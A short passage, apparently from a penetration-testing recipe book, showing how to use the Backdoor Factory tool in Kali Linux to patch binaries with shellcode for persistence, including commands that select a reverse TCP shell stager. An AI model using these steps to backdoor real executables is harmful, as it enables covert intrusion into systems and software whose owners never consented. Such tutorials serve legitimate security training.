Backdooring for persistence
An important part of successful exploitation is to be able to keep access to the compromised machine. In this recipe, you will learn about an amazing tool known as the Backdoor Factory. The main goal of Backdoor Factory is to patch Windows/Linux binaries with our shell code so that the executable runs normally, along with executing our shell code every time it executes.
How to do it...
Backdoor Factory comes installed with Kali. And it can be run using backdoor-factory
. To view all the features of this tool, we will use the help command:
backdoor-factory –help
Note
Usage of this tool is not too hard; however, it is recommended that the binaries be tested before being deployed on the target system.
To view what options are available for a particular binary we choose to backdoor, we use the following command:
backdoor-factory –f <path to binary> -s show
We will then use iat_reverse_tcp_stager_threaded
:
backdoor-factory –f <path to binary> -s iat_reverse_tcp_stager_threaded...